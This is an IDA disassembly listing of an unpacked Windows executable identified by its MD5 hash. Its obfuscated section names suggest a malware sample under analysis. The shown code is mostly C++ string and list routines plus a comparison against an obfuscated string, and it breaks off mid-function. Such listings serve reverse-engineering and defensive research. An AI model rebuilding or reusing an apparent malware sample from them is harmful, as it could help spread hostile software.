;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	179B17CF278FCBD9A4764449742A22A5

; File Name   :	u:\work\179b17cf278fcbd9a4764449742a22a5_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 0001C000 ( 114688.)
; Section size in file		: 0001C000 ( 114688.)
; Offset to raw	data for section: 00001000
; Flags	E0000020: Text Executable Readable Writable
; Alignment	: default


unicode		macro page,string,zero
		irpc c,<string>
		db '&c', page
		endm
		ifnb <zero>
		dw zero
		endif
endm

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401000	proc near		; CODE XREF: sub_401141+79p
					; sub_4011D3+25p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_403332
		mov	eax, [ebp+arg_0]
		add	esp, 10h
		pop	ebp
		retn
sub_401000	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40101C	proc near		; CODE XREF: sub_4012AC+50p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_402F60
		mov	eax, [ebp+arg_0]
		add	esp, 10h
		pop	ebp
		retn
sub_40101C	endp


; =============== S U B	R O U T	I N E =======================================



sub_401038	proc near		; DATA XREF: _1fieagrn:00421CD4o
		mov	dword ptr [ecx], offset	off_41D324
		jmp	sub_40308A
sub_401038	endp

; ---------------------------------------------------------------------------

loc_401043:				; DATA XREF: _1fieagrn:off_41D324o
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41D324
		call	sub_40308A
		test	byte ptr [esp+8], 1
		jz	short loc_40105F
		push	esi
		call	sub_40332D
		pop	ecx

loc_40105F:				; CODE XREF: .text:00401056j
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_401065	proc near		; CODE XREF: sub_40121E+43p
					; sub_4016BA+43p ...
		push	4
		mov	eax, offset loc_41C8FC
		call	sub_40497C
		mov	esi, ecx
		mov	[ebp-10h], esi
		call	sub_402FBB
		and	dword ptr [ebp-4], 0
		push	dword ptr [ebp+8]
		lea	ecx, [esi+0Ch]
		mov	dword ptr [esi], offset	off_41D330
		call	sub_401111
		mov	eax, esi
		call	sub_404A1B
		retn	4
sub_401065	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40109A	proc near		; CODE XREF: .text:004010C8p
					; .text:004010E7j ...
		push	esi
		mov	esi, ecx
		push	0
		push	1
		lea	ecx, [esi+0Ch]
		mov	dword ptr [esi], offset	off_41D330
		call	sub_4011D3
		mov	ecx, esi
		pop	esi
		jmp	sub_40308A
sub_40109A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4010B7	proc near		; DATA XREF: _1fieagrn:0041D334o
					; _1fieagrn:0041D340o ...
		cmp	dword ptr [ecx+24h], 10h
		jb	short loc_4010C1
		mov	eax, [ecx+10h]
		retn
; ---------------------------------------------------------------------------

loc_4010C1:				; CODE XREF: sub_4010B7+4j
		lea	eax, [ecx+10h]
		retn
sub_4010B7	endp

; ---------------------------------------------------------------------------

loc_4010C5:				; DATA XREF: _1fieagrn:off_41D330o
		push	esi
		mov	esi, ecx
		call	sub_40109A
		test	byte ptr [esp+8], 1
		jz	short loc_4010DB
		push	esi
		call	sub_40332D
		pop	ecx

loc_4010DB:				; CODE XREF: .text:004010D2j
		mov	eax, esi
		pop	esi
		retn	4
; ---------------------------------------------------------------------------

loc_4010E1:				; DATA XREF: _1fieagrn:00421C9Co
		mov	dword ptr [ecx], offset	off_41D33C
		jmp	sub_40109A
; ---------------------------------------------------------------------------

loc_4010EC:				; DATA XREF: _1fieagrn:off_41D33Co
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41D33C
		call	sub_40109A
		test	byte ptr [esp+8], 1
		jz	short loc_401108
		push	esi
		call	sub_40332D
		pop	ecx

loc_401108:				; CODE XREF: .text:004010FFj
		mov	eax, esi
		pop	esi
		retn	4
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_28. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_401111	proc near		; CODE XREF: sub_401065+26p
					; sub_4013E6+2Bp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, ecx
		push	0
		mov	dword ptr [esi+18h], 0Fh
		call	sub_40131B
		push	0FFFFFFFFh
		push	0
		push	[esp+0Ch+arg_0]
		mov	ecx, esi
		call	sub_401141
		mov	eax, esi
		pop	esi
		retn	4
sub_401111	endp

; ---------------------------------------------------------------------------

loc_401137:				; CODE XREF: .text:0041C89Ej
					; .text:0041C91Aj ...
		push	0
		push	1
		call	sub_4011D3
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401141	proc near		; CODE XREF: sub_401111+1Bp
					; sub_401547+2Bp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_4]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		cmp	[edi+14h], eax
		mov	ebx, ecx
		jnb	short loc_401159
		call	sub_402A79

loc_401159:				; CODE XREF: sub_401141+11j
		mov	esi, [edi+14h]
		mov	eax, [ebp+arg_4]
		sub	esi, eax
		cmp	[ebp+arg_8], esi
		jnb	short loc_401169
		mov	esi, [ebp+arg_8]

loc_401169:				; CODE XREF: sub_401141+23j
		cmp	ebx, edi
		mov	ecx, ebx
		jnz	short loc_401187
		push	0FFFFFFFFh
		add	esi, eax
		push	esi
		call	sub_4012AC
		push	[ebp+arg_4]
		mov	ecx, ebx
		push	0
		call	sub_4012AC
		jmp	short loc_4011CA
; ---------------------------------------------------------------------------

loc_401187:				; CODE XREF: sub_401141+2Cj
		push	0
		push	esi
		call	sub_401337
		test	al, al
		jz	short loc_4011CA
		cmp	dword ptr [edi+18h], 10h
		jb	short loc_40119E
		mov	edi, [edi+4]
		jmp	short loc_4011A1
; ---------------------------------------------------------------------------

loc_40119E:				; CODE XREF: sub_401141+56j
		add	edi, 4

loc_4011A1:				; CODE XREF: sub_401141+5Bj
		mov	ecx, [ebx+18h]
		cmp	ecx, 10h
		jb	short loc_4011AE
		mov	eax, [ebx+4]
		jmp	short loc_4011B1
; ---------------------------------------------------------------------------

loc_4011AE:				; CODE XREF: sub_401141+66j
		lea	eax, [ebx+4]

loc_4011B1:				; CODE XREF: sub_401141+6Bj
		mov	edx, [ebp+arg_4]
		push	esi
		add	edi, edx
		push	edi
		push	ecx
		push	eax
		call	sub_401000
		add	esp, 10h
		push	esi
		mov	ecx, ebx
		call	sub_40131B

loc_4011CA:				; CODE XREF: sub_401141+44j
					; sub_401141+50j
		pop	edi
		pop	esi
		mov	eax, ebx
		pop	ebx
		pop	ebp
		retn	0Ch
sub_401141	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4011D3	proc near		; CODE XREF: sub_40109A+10p
					; .text:0040113Bp ...

arg_0		= byte ptr  4
arg_4		= dword	ptr  8

		cmp	[esp+arg_0], 0
		push	esi
		mov	esi, ecx
		jz	short loc_401208
		cmp	dword ptr [esi+18h], 10h
		jb	short loc_401208
		cmp	[esp+4+arg_4], 0
		lea	eax, [esi+4]
		push	edi
		mov	edi, [eax]
		jbe	short loc_401200
		push	[esp+8+arg_4]
		push	edi
		push	10h
		push	eax
		call	sub_401000
		add	esp, 10h

loc_401200:				; CODE XREF: sub_4011D3+1Bj
		push	edi
		call	sub_40332D
		pop	ecx
		pop	edi

loc_401208:				; CODE XREF: sub_4011D3+8j
					; sub_4011D3+Ej
		push	[esp+4+arg_4]
		mov	ecx, esi
		mov	dword ptr [esi+18h], 0Fh
		call	sub_40131B
		pop	esi
		retn	8
sub_4011D3	endp


; =============== S U B	R O U T	I N E =======================================



sub_40121E	proc near		; CODE XREF: sub_41C22E+4Ap
		push	44h
		mov	eax, offset loc_41C9FC
		call	sub_40497C
		push	dword ptr [ebp+10h]
		mov	esi, [ebp+0Ch]
		push	dword ptr [esi+4]
		push	esi
		call	sub_401395
		mov	ecx, 0FC0FC0h
		sub	ecx, dword_435294
		cmp	ecx, 1
		jnb	short loc_40127B
		push	offset aListTTooLong ; "list<T>	too long"
		lea	ecx, [ebp-28h]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-28h]
		push	eax
		lea	ecx, [ebp-50h]
		call	sub_401065
		push	offset dword_421C98
		lea	eax, [ebp-50h]
		push	eax
		mov	dword ptr [ebp-50h], offset off_41D33C
		call	sub_40456B

loc_40127B:				; CODE XREF: sub_40121E+29j
		inc	dword_435294
		mov	[esi+4], eax
		mov	ecx, [eax+4]
		mov	[ecx], eax
		call	sub_404A1B
		retn	0Ch
sub_40121E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_401291	proc near		; CODE XREF: .text:loc_41CAEBp
		push	10Ch
		call	sub_40340B
		test	eax, eax
		pop	ecx
		jz	short loc_4012A2
		mov	[eax], eax

loc_4012A2:				; CODE XREF: sub_401291+Dj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short locret_4012AB
		mov	[ecx], eax

locret_4012AB:				; CODE XREF: sub_401291+16j
		retn
sub_401291	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4012AC	proc near		; CODE XREF: sub_401141+33p
					; sub_401141+3Fp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		mov	esi, ecx
		cmp	[esi+14h], edi
		jnb	short loc_4012C0
		call	sub_402A79

loc_4012C0:				; CODE XREF: sub_4012AC+Dj
		mov	eax, [esi+14h]
		sub	eax, edi
		cmp	eax, [ebp+arg_4]
		jnb	short loc_4012CD
		mov	[ebp+arg_4], eax

loc_4012CD:				; CODE XREF: sub_4012AC+1Cj
		cmp	[ebp+arg_4], 0
		jbe	short loc_401313
		mov	ecx, [esi+18h]
		cmp	ecx, 10h
		push	ebx
		lea	edx, [esi+4]
		jb	short loc_4012E3
		mov	ebx, [edx]
		jmp	short loc_4012E5
; ---------------------------------------------------------------------------

loc_4012E3:				; CODE XREF: sub_4012AC+31j
		mov	ebx, edx

loc_4012E5:				; CODE XREF: sub_4012AC+35j
		cmp	ecx, 10h
		jb	short loc_4012EC
		mov	edx, [edx]

loc_4012EC:				; CODE XREF: sub_4012AC+3Cj
		sub	eax, [ebp+arg_4]
		add	ebx, edi
		add	ebx, [ebp+arg_4]
		push	eax
		push	ebx
		sub	ecx, edi
		push	ecx
		add	edx, edi
		push	edx
		call	sub_40101C
		mov	eax, [esi+14h]
		sub	eax, [ebp+arg_4]
		add	esp, 10h
		push	eax
		mov	ecx, esi
		call	sub_40131B
		pop	ebx

loc_401313:				; CODE XREF: sub_4012AC+25j
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebp
		retn	8
sub_4012AC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40131B	proc near		; CODE XREF: sub_401111+Cp
					; sub_401141+84p ...

arg_0		= dword	ptr  4

		cmp	dword ptr [ecx+18h], 10h
		mov	eax, [esp+arg_0]
		mov	[ecx+14h], eax
		jb	short loc_40132D
		mov	ecx, [ecx+4]
		jmp	short loc_401330
; ---------------------------------------------------------------------------

loc_40132D:				; CODE XREF: sub_40131B+Bj
		add	ecx, 4

loc_401330:				; CODE XREF: sub_40131B+10j
		mov	byte ptr [ecx+eax], 0
		retn	4
sub_40131B	endp


; =============== S U B	R O U T	I N E =======================================



sub_401337	proc near		; CODE XREF: sub_401141+49p
					; sub_401547+39p

arg_0		= dword	ptr  4
arg_4		= byte ptr  8

		push	esi
		push	edi
		mov	edi, [esp+8+arg_0]
		cmp	edi, 0FFFFFFFEh
		mov	esi, ecx
		jbe	short loc_401349
		call	sub_402A3A

loc_401349:				; CODE XREF: sub_401337+Bj
		cmp	[esi+18h], edi
		jnb	short loc_40135B

loc_40134E:				; DATA XREF: sub_4910D7+26Fr
		push	dword ptr [esi+14h]
		mov	ecx, esi
		push	edi
		call	sub_401442
		jmp	short loc_401388
; ---------------------------------------------------------------------------

loc_40135B:				; CODE XREF: sub_401337+15j
		cmp	[esp+8+arg_4], 0
		jz	short loc_40137C
		cmp	edi, 10h
		jnb	short loc_40137C
		mov	eax, [esi+14h]
		cmp	edi, eax
		jnb	short loc_401370
		mov	eax, edi

loc_401370:				; CODE XREF: sub_401337+35j
		push	eax
		push	1
		mov	ecx, esi
		call	sub_4011D3
		jmp	short loc_401388
; ---------------------------------------------------------------------------

loc_40137C:				; CODE XREF: sub_401337+29j
					; sub_401337+2Ej
		test	edi, edi
		jnz	short loc_401388
		push	edi
		mov	ecx, esi
		call	sub_40131B

loc_401388:				; CODE XREF: sub_401337+22j
					; sub_401337+43j ...
		xor	eax, eax
		cmp	eax, edi
		sbb	eax, eax
		pop	edi
		neg	eax
		pop	esi
		retn	8
sub_401337	endp


; =============== S U B	R O U T	I N E =======================================



sub_401395	proc near		; CODE XREF: sub_40121E+16p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	10Ch
		call	sub_40340B
		test	eax, eax
		pop	ecx
		jz	short loc_4013AA
		mov	ecx, [esp+arg_0]
		mov	[eax], ecx

loc_4013AA:				; CODE XREF: sub_401395+Dj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short loc_4013B7
		mov	edx, [esp+arg_4]
		mov	[ecx], edx

loc_4013B7:				; CODE XREF: sub_401395+1Aj
		push	edi
		lea	edi, [eax+8]
		test	edi, edi
		jz	short loc_4013CA
		push	esi
		mov	esi, [esp+8+arg_8]
		push	41h
		pop	ecx
		rep movsd
		pop	esi

loc_4013CA:				; CODE XREF: sub_401395+28j
		pop	edi
		retn	0Ch
sub_401395	endp

; ---------------------------------------------------------------------------
		push	esi
		push	dword ptr [esp+8]
		mov	esi, ecx
		call	sub_4013E6
		mov	dword ptr [esi], offset	off_41D33C
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_4013E6	proc near		; CODE XREF: .text:004013D5p
					; sub_402A79+46p
		push	4
		mov	eax, offset loc_41C8FC
		call	sub_40497C
		mov	esi, ecx
		mov	[ebp-10h], esi
		mov	edi, [ebp+8]
		push	edi
		call	sub_403032
		and	dword ptr [ebp-4], 0
		add	edi, 0Ch
		push	edi
		lea	ecx, [esi+0Ch]
		mov	dword ptr [esi], offset	off_41D330
		call	sub_401111
		mov	eax, esi
		call	sub_404A1B
		retn	4
sub_4013E6	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_401420	proc near		; CODE XREF: sub_40121E+33p
					; sub_4016BA+33p ...

arg_0		= dword	ptr  4

		push	esi
		mov	esi, ecx
		push	0
		mov	dword ptr [esi+18h], 0Fh
		call	sub_40131B
		push	[esp+4+arg_0]
		mov	ecx, esi
		call	sub_401524
		mov	eax, esi
		pop	esi
		retn	4
sub_401420	endp


; =============== S U B	R O U T	I N E =======================================



sub_401442	proc near		; CODE XREF: sub_401337+1Dp
		push	0Ch
		mov	eax, offset sub_41C8D9
		call	sub_4049AF
		mov	edi, ecx
		mov	[ebp-18h], edi
		mov	esi, [ebp+8]
		or	esi, 0Fh
		cmp	esi, 0FFFFFFFEh
		jbe	short loc_401463
		mov	esi, [ebp+8]
		jmp	short loc_401488
; ---------------------------------------------------------------------------

loc_401463:				; CODE XREF: sub_401442+1Aj
		xor	edx, edx
		push	3
		mov	eax, esi
		pop	ebx
		div	ebx
		mov	ecx, [edi+18h]
		mov	[ebp-14h], ecx
		shr	dword ptr [ebp-14h], 1
		mov	edx, [ebp-14h]
		cmp	eax, edx
		jnb	short loc_401488
		push	0FFFFFFFEh
		pop	eax
		sub	eax, edx
		cmp	ecx, eax
		ja	short loc_401488
		lea	esi, [edx+ecx]

loc_401488:				; CODE XREF: sub_401442+1Fj
					; sub_401442+38j ...
		and	dword ptr [ebp-4], 0
		lea	eax, [esi+1]
		push	0
		push	eax
		call	sub_4015ED
		pop	ecx
		pop	ecx
		mov	ebx, eax
		jmp	short loc_4014C7
; ---------------------------------------------------------------------------
byte_40149D	db 8Bh,	45h		; DATA XREF: _1fieagrn:00421DF4o
dword_40149F	dd 0F0658908h		; DATA XREF: sub_4910D7+20Fr
					; zbox2z3f:00491808r ...
; ---------------------------------------------------------------------------
		mov	[ebp+8], eax
		inc	eax
		push	0

loc_4014A9:				; DATA XREF: sub_4910D7+A1r
		push	eax
		mov	byte ptr [ebp-4], 2
		call	sub_4015ED
		pop	ecx
		mov	[ebp-14h], eax
		pop	ecx
		mov	eax, offset loc_4014BE
		retn
; ---------------------------------------------------------------------------

loc_4014BE:				; DATA XREF: sub_401442+76o
		mov	edi, [ebp-18h]
		mov	esi, [ebp+8]
		mov	ebx, [ebp-14h]

loc_4014C7:				; CODE XREF: sub_401442+59j
		cmp	dword ptr [ebp+0Ch], 0
		jbe	short loc_4014EC
		cmp	dword ptr [edi+18h], 10h
		jb	short loc_4014D8
		mov	eax, [edi+4]
		jmp	short loc_4014DB
; ---------------------------------------------------------------------------

loc_4014D8:				; CODE XREF: sub_401442+8Fj
		lea	eax, [edi+4]

loc_4014DB:				; CODE XREF: sub_401442+94j
		push	dword ptr [ebp+0Ch]
		push	eax
		lea	eax, [esi+1]
		push	eax
		push	ebx
		call	sub_401000
		add	esp, 10h

loc_4014EC:				; CODE XREF: sub_401442+89j
		push	0
		push	1
		mov	ecx, edi
		call	sub_4011D3
		push	dword ptr [ebp+0Ch]
		mov	ecx, edi
		mov	[edi+4], ebx
		mov	[edi+18h], esi
		call	sub_40131B
		call	sub_404A1B
		retn	8
sub_401442	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40150F	proc near		; DATA XREF: _1fieagrn:00421DE4o
		mov	ecx, [ebp-18h]
		xor	esi, esi
		push	esi
		push	1
		call	sub_4011D3
		push	esi
		push	esi
		call	sub_40456B
		int	3		; Trap to Debugger
sub_40150F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_401524	proc near		; CODE XREF: sub_401420+17p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		mov	esi, ecx
		lea	edx, [eax+1]

loc_40152E:				; CODE XREF: sub_401524+Fj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_40152E
		sub	eax, edx
		push	eax
		push	[esp+8+arg_0]
		mov	ecx, esi
		call	sub_401547
		pop	esi
		retn	4
sub_401524	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401547	proc near		; CODE XREF: sub_401524+1Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		push	edi
		mov	esi, ecx
		call	sub_4015B9
		test	al, al
		jz	short loc_401579
		cmp	dword ptr [esi+18h], 10h
		jb	short loc_401566
		mov	eax, [esi+4]
		jmp	short loc_401569
; ---------------------------------------------------------------------------

loc_401566:				; CODE XREF: sub_401547+18j
		lea	eax, [esi+4]

loc_401569:				; CODE XREF: sub_401547+1Dj
		push	[ebp+arg_4]
		sub	edi, eax
		push	edi
		push	esi
		mov	ecx, esi
		call	sub_401141
		jmp	short loc_4015B3
; ---------------------------------------------------------------------------

loc_401579:				; CODE XREF: sub_401547+12j
		push	0
		push	[ebp+arg_4]
		mov	ecx, esi
		call	sub_401337
		test	al, al
		jz	short loc_4015B1
		mov	ecx, [esi+18h]
		cmp	ecx, 10h
		jb	short loc_401596
		mov	eax, [esi+4]
		jmp	short loc_401599
; ---------------------------------------------------------------------------

loc_401596:				; CODE XREF: sub_401547+48j
		lea	eax, [esi+4]

loc_401599:				; CODE XREF: sub_401547+4Dj
		push	[ebp+arg_4]
		push	edi
		push	ecx
		push	eax
		call	sub_401000
		add	esp, 10h
		push	[ebp+arg_4]
		mov	ecx, esi
		call	sub_40131B

loc_4015B1:				; CODE XREF: sub_401547+40j
		mov	eax, esi

loc_4015B3:				; CODE XREF: sub_401547+30j
		pop	edi
		pop	esi
		pop	ebp
		retn	8
sub_401547	endp


; =============== S U B	R O U T	I N E =======================================



sub_4015B9	proc near		; CODE XREF: sub_401547+Bp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [ecx+18h]
		cmp	esi, 10h
		lea	eax, [ecx+4]
		jb	short loc_4015C9
		mov	edx, [eax]
		jmp	short loc_4015CB
; ---------------------------------------------------------------------------

loc_4015C9:				; CODE XREF: sub_4015B9+Aj
		mov	edx, eax

loc_4015CB:				; CODE XREF: sub_4015B9+Ej
		cmp	[esp+4+arg_0], edx
		jb	short loc_4015E7
		cmp	esi, 10h
		jb	short loc_4015D8
		mov	eax, [eax]

loc_4015D8:				; CODE XREF: sub_4015B9+1Bj
		mov	ecx, [ecx+14h]
		add	ecx, eax
		cmp	ecx, [esp+4+arg_0]
		jbe	short loc_4015E7
		mov	al, 1
		jmp	short loc_4015E9
; ---------------------------------------------------------------------------

loc_4015E7:				; CODE XREF: sub_4015B9+16j
					; sub_4015B9+28j
		xor	al, al

loc_4015E9:				; CODE XREF: sub_4015B9+2Cj
		pop	esi
		retn	4
sub_4015B9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4015ED	proc near		; CODE XREF: sub_401442+50p
					; sub_401442+6Cp

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	ecx, [ebp+arg_0]
		sub	esp, 0Ch
		test	ecx, ecx
		ja	short loc_401605
		xor	ecx, ecx

loc_4015FC:				; CODE XREF: sub_4015ED+22j
		push	ecx
		call	sub_40340B
		pop	ecx
		leave
		retn
; ---------------------------------------------------------------------------

loc_401605:				; CODE XREF: sub_4015ED+Bj
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	ecx
		cmp	eax, 1
		jnb	short loc_4015FC
		and	[ebp+arg_0], 0
		lea	eax, [ebp+arg_0]
		push	eax
		lea	ecx, [ebp+var_C]
		call	sub_402FCC
		push	offset dword_421CD0
		lea	eax, [ebp+var_C]
		push	eax
		mov	[ebp+var_C], offset off_41D324
		call	sub_40456B
		int	3		; Trap to Debugger
		push	esi
		push	[esp+10h+var_8]
		mov	esi, ecx
		call	sub_403032
		mov	dword ptr [esi], offset	off_41D324
		mov	eax, esi
		pop	esi
		retn	4
sub_4015ED	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40164F	proc near		; CODE XREF: sub_401E4A+FFp
					; sub_401FD7+4Ep ...
		cmp	dword ptr [esi], 0
		jnz	short loc_401659
		call	sub_40331D

loc_401659:				; CODE XREF: sub_40164F+3j
		mov	eax, [esi]
		mov	ecx, [esi+4]
		cmp	ecx, [eax+4]
		jnz	short loc_401668
		call	sub_40331D

loc_401668:				; CODE XREF: sub_40164F+12j
		mov	eax, [esi+4]
		add	eax, 8
		retn
sub_40164F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40166F	proc near		; CODE XREF: sub_401E4A+F1p
					; sub_401FD7+40p ...
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_401679
		cmp	eax, [edi]
		jz	short loc_40167E

loc_401679:				; CODE XREF: sub_40166F+4j
		call	sub_40331D

loc_40167E:				; CODE XREF: sub_40166F+8j
		mov	eax, [esi+4]
		xor	ecx, ecx
		cmp	eax, [edi+4]
		setnz	cl
		mov	al, cl
		retn
sub_40166F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40168C	proc near		; CODE XREF: sub_401E4A+11Ap
					; sub_401FD7+69p ...
		cmp	dword ptr [esi], 0
		mov	eax, [esi]
		mov	[edi], eax
		mov	eax, [esi+4]
		mov	[edi+4], eax
		jnz	short loc_4016A0
		call	sub_40331D

loc_4016A0:				; CODE XREF: sub_40168C+Dj
		mov	eax, [esi]
		mov	ecx, [esi+4]
		cmp	ecx, [eax+4]
		jnz	short loc_4016AF
		call	sub_40331D

loc_4016AF:				; CODE XREF: sub_40168C+1Cj
		mov	eax, [esi+4]
		mov	eax, [eax]
		mov	[esi+4], eax
		mov	eax, edi
		retn
sub_40168C	endp


; =============== S U B	R O U T	I N E =======================================



sub_4016BA	proc near		; CODE XREF: sub_414884+54p
		push	48h
		mov	eax, offset loc_41C91F
		call	sub_40497C
		push	dword ptr [ebp+8]
		mov	esi, [ebp+10h]
		push	dword ptr [esi+4]
		push	esi
		call	sub_401745
		mov	ecx, 3C3C3C3h
		sub	ecx, dword_4352A0
		cmp	ecx, 1
		jnb	short loc_401717
		push	offset aListTTooLong ; "list<T>	too long"
		lea	ecx, [ebp-2Ch]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-2Ch]
		push	eax
		lea	ecx, [ebp-54h]
		call	sub_401065
		push	offset dword_421C98
		lea	eax, [ebp-54h]
		push	eax
		mov	dword ptr [ebp-54h], offset off_41D33C
		call	sub_40456B

loc_401717:				; CODE XREF: sub_4016BA+29j
		inc	dword_4352A0
		mov	[esi+4], eax
		mov	ecx, [eax+4]
		mov	[ecx], eax
		call	sub_404A1B
		retn	0Ch
sub_4016BA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40172D	proc near		; CODE XREF: .text:0041CB08p
		push	4Ch
		call	sub_40340B
		test	eax, eax
		pop	ecx
		jz	short loc_40173B
		mov	[eax], eax

loc_40173B:				; CODE XREF: sub_40172D+Aj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short locret_401744
		mov	[ecx], eax

locret_401744:				; CODE XREF: sub_40172D+13j
		retn
sub_40172D	endp


; =============== S U B	R O U T	I N E =======================================



sub_401745	proc near		; CODE XREF: sub_4016BA+16p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	4Ch
		call	sub_40340B
		test	eax, eax
		pop	ecx
		jz	short loc_401757
		mov	ecx, [esp+arg_0]
		mov	[eax], ecx

loc_401757:				; CODE XREF: sub_401745+Aj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short loc_401764
		mov	edx, [esp+arg_4]
		mov	[ecx], edx

loc_401764:				; CODE XREF: sub_401745+17j
		push	edi
		lea	edi, [eax+8]
		test	edi, edi
		jz	short loc_401777
		push	esi
		mov	esi, [esp+8+arg_8]
		push	11h
		pop	ecx
		rep movsd
		pop	esi

loc_401777:				; CODE XREF: sub_401745+25j
		pop	edi
		retn	0Ch
sub_401745	endp


; =============== S U B	R O U T	I N E =======================================



sub_40177B	proc near		; DATA XREF: _1fieagrn:off_420B94o
		push	4B8h
		mov	eax, offset loc_41CAC3

loc_401785:				; DATA XREF: zbox2z3f:00491350o
		call	sub_4049E5
		cmp	dword ptr [ebp+1Ch], 3
		mov	eax, [ebp+10h]
		mov	edi, [ebp+20h]
		mov	[ebp-4C4h], eax
		mov	eax, [ebp+18h]
		mov	[ebp-4BCh], eax
		mov	[ebp-4C0h], edi
		jl	loc_4019D5
		mov	esi, 0BFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp-18Fh]
		push	ebx
		push	eax
		mov	[ebp-190h], bl
		call	sub_407F20
		push	esi
		lea	eax, [ebp-0CFh]
		push	ebx
		push	eax
		mov	[ebp-0D0h], bl
		call	sub_407F20
		push	dword ptr [edi+4]
		lea	edi, [ebp-190h]
		call	sub_41BDAA
		push	0C0h
		lea	esi, [ebp-0D0h]
		mov	ebx, offset asc_426838 ; "»¸¹È½¶½»¶Ï¸º·½È·½¿ÊÊÊÊ˽¹ÈÌ¿¶º¿ËË˽º¶½¶"...
		call	sub_419EC1
		add	esp, 20h
		cmp	byte ptr [ebp+8], 0
		jz	short loc_401817
		cmp	byte_426832, 0
		jz	loc_4019EB

loc_401817:				; CODE XREF: sub_40177B+8Dj
		lea	ecx, [ebp-0D0h]
		lea	eax, [ebp-190h]

loc_401823:				; CODE XREF: sub_40177B+C0j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_401841
		test	dl, dl
		jz	short loc_40183D
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_401841
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_401823

loc_40183D:				; CODE XREF: sub_40177B+B0j
		xor	eax, eax
		jmp	short loc_401846
; ---------------------------------------------------------------------------

loc_401841:				; CODE XREF: sub_40177B+ACj
